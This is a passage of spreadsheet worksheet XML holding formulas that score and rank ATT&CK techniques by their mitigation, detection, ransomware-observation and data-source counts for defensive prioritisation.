      <c r="O102" s="51">
        <v>0</v>
      </c>
      <c r="P102" s="51">
        <v>1</v>
      </c>
      <c r="Q102" s="51">
        <v>0</v>
      </c>
      <c r="R102" s="52" t="s">
        <v>491</v>
      </c>
      <c r="S102" s="51">
        <v>2</v>
      </c>
      <c r="T102" s="51" t="s">
        <v>492</v>
      </c>
      <c r="U102" s="51">
        <v>5</v>
      </c>
      <c r="V102" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>7.1428571428571425E-2</v>
      </c>
      <c r="W102">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X102">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y102">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z102">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA102">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB102">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC102" s="29" t="s">
        <v>493</v>
      </c>
      <c r="AD102" s="25" t="str" cm="1">
        <f t="array" ref="AD102">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC102)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE102" s="25">
        <f>IF(AD102="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF102" s="25" t="str" cm="1">
        <f t="array" ref="AF102">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC102)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG102" s="25">
        <f>IF(AF102="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH102" s="25" t="str" cm="1">
        <f t="array" ref="AH102">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC102)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI102" s="25">
        <f>IF(AH102="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ102" s="25" t="str" cm="1">
        <f t="array" ref="AJ102">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC102)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK102" s="25">
        <f>IF(AJ102="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL102" s="25" t="str" cm="1">
        <f t="array" ref="AL102">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC102)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM102" s="25">
        <f>IF(AL102="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN102" s="60">
        <v>2</v>
      </c>
      <c r="AO102" s="51">
        <v>1</v>
      </c>
      <c r="AP102" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.7239288293809517E-2</v>
      </c>
      <c r="AQ102" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.8575405423809521E-2</v>
      </c>
      <c r="AR102" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.8575405423809521E-2</v>
      </c>
      <c r="AS102" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT102" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU10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03" spans="1:47" ht="48">
      <c r="A103" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.7716194180952394E-3</v>
      </c>
      <c r="B103" s="25">
        <f>SUM(H103,M103,V103)*(1+SUM(AE103,AG103,AI103,AK103,AM103))</f>
        <v>6.7716194180952399E-2</v>
      </c>
      <c r="C103" s="25" t="s">
        <v>494</v>
      </c>
      <c r="D103" s="25" t="s">
        <v>495</v>
      </c>
      <c r="E103" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F103" s="51">
        <v>1</v>
      </c>
      <c r="G103" s="51">
        <v>0</v>
      </c>
      <c r="H103" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I103">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J103">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K103">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L103">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M103" s="44">
        <v>2.9615000000000002E-4</v>
      </c>
      <c r="N103" s="51">
        <v>0</v>
      </c>
      <c r="O103" s="51">
        <v>1</v>
      </c>
      <c r="P103" s="51">
        <v>1</v>
      </c>
      <c r="Q103" s="51">
        <v>0</v>
      </c>
      <c r="R103" s="51"/>
      <c r="S103" s="51">
        <v>0</v>
      </c>
      <c r="T103" s="51"/>
      <c r="U103" s="51">
        <v>0</v>
      </c>
      <c r="V103" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W103">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X103">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y103">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z103">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA103">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB103">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC103" s="29" t="s">
        <v>496</v>
      </c>
      <c r="AD103" s="25" t="str" cm="1">
        <f t="array" ref="AD103">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC103)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE103" s="25">
        <f>IF(AD103="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF103" s="25" t="str" cm="1">
        <f t="array" ref="AF103">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC103)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG103" s="25">
        <f>IF(AF103="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH103" s="25" t="str" cm="1">
        <f t="array" ref="AH103">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC103)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI103" s="25">
        <f>IF(AH103="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ103" s="25" t="str" cm="1">
        <f t="array" ref="AJ103">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC103)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK103" s="25">
        <f>IF(AJ103="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL103" s="25" t="str" cm="1">
        <f t="array" ref="AL103">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC103)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM103" s="25">
        <f>IF(AL103="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN103" s="60">
        <v>0</v>
      </c>
      <c r="AO103" s="51">
        <v>0</v>
      </c>
      <c r="AP103" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.7716194180952394E-3</v>
      </c>
      <c r="AQ103" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.2572064726984132E-2</v>
      </c>
      <c r="AR103" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.2572064726984132E-2</v>
      </c>
      <c r="AS103" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT103" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU10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04" spans="1:47" ht="48">
      <c r="A104" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14621872119047619</v>
      </c>
      <c r="B104" s="25">
        <f>SUM(H104,M104,V104)*(1+SUM(AE104,AG104,AI104,AK104,AM104))</f>
        <v>0.46218721190476197</v>
      </c>
      <c r="C104" s="25" t="s">
        <v>497</v>
      </c>
      <c r="D104" s="25" t="s">
        <v>498</v>
      </c>
      <c r="E104" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F104" s="51">
        <v>4</v>
      </c>
      <c r="G104" s="51">
        <v>2</v>
      </c>
      <c r="H104" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.30000000000000004</v>
      </c>
      <c r="I104">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J104">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K104">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L104">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M104" s="44">
        <v>2.8245000000000001E-4</v>
      </c>
      <c r="N104" s="51">
        <v>0</v>
      </c>
      <c r="O104" s="51">
        <v>0</v>
      </c>
      <c r="P104" s="51">
        <v>0</v>
      </c>
      <c r="Q104" s="51">
        <v>0</v>
      </c>
      <c r="R104" s="52" t="s">
        <v>499</v>
      </c>
      <c r="S104" s="51">
        <v>7</v>
      </c>
      <c r="T104" s="51" t="s">
        <v>500</v>
      </c>
      <c r="U104" s="51">
        <v>10</v>
      </c>
      <c r="V104" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.16190476190476191</v>
      </c>
      <c r="W104">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X104">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y104">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z104">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA104">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB104">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC104" s="29" t="s">
        <v>141</v>
      </c>
      <c r="AD104" s="25" t="str" cm="1">
        <f t="array" ref="AD104">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC104)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE104" s="25">
        <f>IF(AD104="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF104" s="25" t="str" cm="1">
        <f t="array" ref="AF104">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC104)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG104" s="25">
        <f>IF(AF104="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH104" s="25" t="str" cm="1">
        <f t="array" ref="AH104">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC104)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI104" s="25">
        <f>IF(AH104="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ104" s="25" t="str" cm="1">
        <f t="array" ref="AJ104">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC104)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK104" s="25">
        <f>IF(AJ104="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL104" s="25" t="str" cm="1">
        <f t="array" ref="AL104">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC104)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM104" s="25">
        <f>IF(AL104="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN104" s="60">
        <v>3</v>
      </c>
      <c r="AO104" s="51">
        <v>1</v>
      </c>
      <c r="AP104" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14621872119047619</v>
      </c>
      <c r="AQ104" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.15406240396825399</v>
      </c>
      <c r="AR104" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.15406240396825399</v>
      </c>
      <c r="AS104" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT104" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU10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05" spans="1:47" ht="32.1">
      <c r="A105" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.4161466823333331E-2</v>
      </c>
      <c r="B105" s="25">
        <f>SUM(H105,M105,V105)*(1+SUM(AE105,AG105,AI105,AK105,AM105))</f>
        <v>0.60828133490000003</v>
      </c>
      <c r="C105" s="25" t="s">
        <v>501</v>
      </c>
      <c r="D105" s="25" t="s">
        <v>502</v>
      </c>
      <c r="E105" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F105" s="51">
        <v>1</v>
      </c>
      <c r="G105" s="51">
        <v>1</v>
      </c>
      <c r="H105" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I105">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J105">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K105">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L105">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M105" s="44">
        <v>2.1153E-4</v>
      </c>
      <c r="N105" s="51">
        <v>0</v>
      </c>
      <c r="O105" s="51">
        <v>0</v>
      </c>
      <c r="P105" s="51">
        <v>0</v>
      </c>
      <c r="Q105" s="51">
        <v>1</v>
      </c>
      <c r="R105" s="52" t="s">
        <v>503</v>
      </c>
      <c r="S105" s="51">
        <v>18</v>
      </c>
      <c r="T105" s="52" t="s">
        <v>504</v>
      </c>
      <c r="U105" s="51">
        <v>19</v>
      </c>
      <c r="V105" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.35714285714285715</v>
      </c>
      <c r="W105">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>37</v>
      </c>
      <c r="X105">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.67272727272727273</v>
      </c>
      <c r="Y105">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.67272727272727273</v>
      </c>
      <c r="Z105">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA105">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB105">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC105" s="29" t="s">
        <v>505</v>
      </c>
      <c r="AD105" s="25" t="str" cm="1">
        <f t="array" ref="AD105">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC105)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE105" s="25">
        <f>IF(AD105="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF105" s="25" t="str" cm="1">
        <f t="array" ref="AF105">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC105)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG105" s="25">
        <f>IF(AF105="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH105" s="25" t="str" cm="1">
        <f t="array" ref="AH105">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC105)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI105" s="25">
        <f>IF(AH105="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ105" s="25" t="str" cm="1">
        <f t="array" ref="AJ105">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC105)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK105" s="25">
        <f>IF(AJ105="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL105" s="25" t="str" cm="1">
        <f t="array" ref="AL105">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC105)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM105" s="25">
        <f>IF(AL105="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN105" s="60">
        <v>1</v>
      </c>
      <c r="AO105" s="51">
        <v>1</v>
      </c>
      <c r="AP105" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.4161466823333331E-2</v>
      </c>
      <c r="AQ105" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.20276044496666668</v>
      </c>
      <c r="AR105" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.20276044496666668</v>
      </c>
      <c r="AS105" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT105" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU10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06" spans="1:47" ht="63.95">
      <c r="A106" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.1728133490000001E-2</v>
      </c>
      <c r="B106" s="25">
        <f>SUM(H106,M106,V106)*(1+SUM(AE106,AG106,AI106,AK106,AM106))</f>
        <v>0.18394800156666669</v>
      </c>
      <c r="C106" s="25" t="s">
        <v>506</v>
      </c>
      <c r="D106" s="25" t="s">
        <v>507</v>
      </c>
      <c r="E106" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F106" s="51">
        <v>1</v>
      </c>
      <c r="G106" s="51">
        <v>1</v>
      </c>
      <c r="H106" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I106">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J106">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K106">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L106">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M106" s="44">
        <v>2.1153E-4</v>
      </c>
      <c r="N106" s="51">
        <v>0</v>
      </c>
      <c r="O106" s="51">
        <v>5</v>
      </c>
      <c r="P106" s="51">
        <v>1</v>
      </c>
      <c r="Q106" s="51">
        <v>2</v>
      </c>
      <c r="R106" s="51"/>
      <c r="S106" s="51">
        <v>0</v>
      </c>
      <c r="T106" s="51"/>
      <c r="U106" s="51">
        <v>0</v>
      </c>
      <c r="V106" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>3.8095238095238092E-2</v>
      </c>
      <c r="W106">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X106">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y106">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z106">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA106">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB106">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC106" s="29" t="s">
        <v>508</v>
      </c>
      <c r="AD106" s="25" t="str" cm="1">
        <f t="array" ref="AD106">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC106)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE106" s="25">
        <f>IF(AD106="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
